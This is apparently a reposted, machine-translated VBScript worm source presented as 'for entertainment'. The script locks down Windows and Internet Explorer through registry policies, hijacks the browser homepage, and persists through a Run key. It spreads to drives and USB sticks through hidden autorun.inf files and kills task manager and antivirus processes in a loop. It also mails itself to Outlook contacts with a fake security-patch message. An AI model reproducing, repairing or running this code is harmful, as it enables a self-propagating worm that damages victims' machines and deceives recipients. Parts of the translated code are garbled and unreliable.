Reprinted please indicate the source
A little malicious! Test with caution
'This procedure is written in sechaos, only for entertainment, not malicious communication, crack or rewrite. I am not liable, the final interpretation of all sechaos.
Dim FSO, wsh, myfile, WS, PP, fsofolder
Set wsh = wscript. Createobject ("wscript. Shell ")
Set FSO = wscript. Createobject ("scripting. FileSystemObject ")
Set myfile = FSO. GetFile (wscript. scriptfullname)
'To modify the Registry (Start Menu which things and the IE settings)
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ showall \ checkedvalue", 0, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nobrowsercontextmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nobrowseroptions", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nobrowsersaveas", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ nofileopen", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ Advanced", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ cache Internet", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ AutoConfig", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ Homepage", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ History", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ connwiz admin lock", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ Start page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ search page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ default_page_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ default_search_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ Start page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ default_page_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ default_search_url", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "HKEY_USERS \. Default \ Software \ Microsoft \ Internet Explorer \ main \ search page", "http://www.cnblogs.com/Chaobs"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ Homepage", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ securitytab", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Control Panel \ resetwebsettings", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ Restrictions \ noviewsource", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ SOFTWARE \ Policies \ Microsoft \ Internet Explorer \ infodelivery \ Restrictions \ noaddingsubscriptions", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nofilemenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ winoldapp \ norealmode", 1, "REG_DWORD"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ win32system", "C: \ nyboy. vbs"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ scanregistry ",""
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nologoff", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ norun", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nodesktop", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ noviewcontextmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ notraycontextmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ noclose", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ startmenulogoff", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nosmhelp", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nonethood", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nowinkeys", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nosetfolders", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ norecentdocsmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nofind", "1", "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nowindowsupdate", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nosettaskbar", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ nofavoritesmenu", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ norecentdocshistory", 1, "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ disableregistrytools", "1", "REG_DWORD"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ winoldapp \ disabled", 1, "REG_DWORD"
'The user can double-click on a hard disk, it can also be modified for so that it can not open file folder
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ drive \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
Wsh. regwrite "hkcr \ drive \ shell \", "Auto"
Wsh. regwrite "hkcr \ drive \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ directory \ shell \", "Auto"
Wsh. regwrite "hkcr \ directory \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ directory \ shell \ auto \ command \", "C: \ nyboy. Bat '% 1 '"
'Modify default file icon
Wsh. regwrite "hkcr \ exefile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ txtfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ dllfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ batfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "hkcr \ INIFILE \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ exefile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ txtfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ dllfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ batfile \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \ INIFILE \ defaulticon \", "C: \ 1.ico"
Wsh. regwrite "HKLM \ SOFTWARE \ Classes \. Reg \", "txtfile"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ legalnoticecaption", "Hello, chaobs and you have a joke"
Wsh. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ legalnoticetext"
'Copy itself to the C, D, E, F, U Disk
Myfile. Copy "C :\"
Myfile. Copy "D :\"
Myfile. Copy "E :\"
Myfile. Copy "F :\"
Myfile. Copy "I :\"
Myfile. Attributes = 34
'Define the autorun. inf content that is U disk virus must be part of the code
If FSO. fileexists ("C: \ autorun. inf") then
Set objfolder = FSO. GetFile ("C: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> C: \ autorun. inf "_
& "& Echo open = nyboy. Bat> C: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> C: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> C: \ autorun. inf "_
& "& Echo shell = auto> C: \ autorun. inf "_
& "& Attrib + H + S + R c: \ autorun. inf"
Set autobatc = FSO. createtextfile ("C: \ nyboy. Bat", 1, ture)
Autobatc. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("D: \ autorun. inf") then
Set objfolder = FSO. GetFile ("D: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> D: \ autorun. inf "_
& "& Echo open = nyboy. Bat> D: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> D: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> D: \ autorun. inf "_
& "& Echo shell = auto> D: \ autorun. inf "_
& "& Attrib + H + S + r d: \ autorun. inf"
Set autobatd = FSO. createtextfile ("D: \ nyboy. Bat", 1, ture)
Autobatd. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("E: \ autorun. inf") then
Set objfolder = FSO. GetFile ("E: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> E: \ autorun. inf "_
& "& Echo open = nyboy. Bat> E: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> E: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> E: \ autorun. inf "_
& "& Echo shell = auto> E: \ autorun. inf "_
& "& Attrib + H + S + r e: \ autorun. inf"
Set autobate = FSO. createtextfile ("E: \ nyboy. Bat", 1, ture)
Autobate. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("F: \ autorun. inf") then
Set objfolder = FSO. GetFile ("F: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> F: \ autorun. inf "_
& "& Echo open = nyboy. Bat> F: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> F: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> F: \ autorun. inf "_
& "& Echo shell = auto> F: \ autorun. inf "_
& "& Attrib + H + S + r f: \ autorun. inf"
Set autobatf = FSO. createtextfile ("F: \ nyboy. Bat", 1, ture)
Autobatf. writeline ("nyboy. vbs ")
End if
If FSO. fileexists ("I: \ autorun. inf") then
Set objfolder = FSO. GetFile ("I: \ autorun. inf ")
Else
Wsh. Run "CMD/C echo [Autorun]> I: \ autorun. inf "_
& "& Echo open = nyboy. Bat> I: \ autorun. inf "_
& "& Echo ShellExecute = nyboy. Bat> I: \ autorun. inf "_
& "& Echo Shell \ auto \ command = nyboy. Bat> I: \ autorun. inf "_
& "& Echo shell = auto> I: \ autorun. inf "_
& "& Attrib + H + S + r I: \ autorun. inf"
Set autobatf = FSO. createtextfile ("I: \ nyboy. Bat", 1, ture)
Autobatf. writeline ("nyboy. vbs ")
End if
'Set attributes for the system read only hidden virus body
Wsh. Run "CMD/C attrib + H + S + R c: \ nyboy. Bat "_
& "& Attrib + H + S + r d: \ nyboy. Bat "_
& "& Attrib + H + S + r e: \ nyboy. Bat "_
& "& Attrib + H + S + r f: \ nyboy. Bat "_
& "& Attrib + H + S + r I: \ nyboy. Bat"
'Mandatory end of certain processes, such as QQ, notepad, webpage, batch file, carbachol, realplay process, after running to open these files
Do
Set Ws = GetObject ("winmgmts: \. \ Root \ cimv2 ")
Set pp1_ws.exe cquery ("select * From win32_process where name1_'taskmgr.exe 'or name = 'qq.exe' or name = 'notepad.exe 'or name = 'ipolice.exe' or name = 'cmd.exe 'or name = 'avp.exe' or name = 'winrar.exe 'or name = 'realplay.exe' or name = 'winword.exe '")
For each I in PP
I. Terminate ()
Wscript. Sleep 100
Next
Loop
'The virus can be spread by mail
Set OL = Createobject ("Outlook. application ")
On Error resume next
For x = 1 to 5
Set mail = ol. createitem (0)
Mail. To = ol. getnamespace ("mapi"). addresslists (1). addressentries (X)
Mail. Subject = " virus test"
Mail. Body = "Dear user, in order to better serve users and enhance the virus prevention capability by this patch is specially released. Details can be found on the official website. For specific tests, please follow the attachment. You may need to disable or prevent the old version from running for online upgrade. Thank you for your cooperation at the R & D center"
Mail. attachments. Add ("C: \ nyboy. vbs ")
Mail. Send
Next
Ol. Quit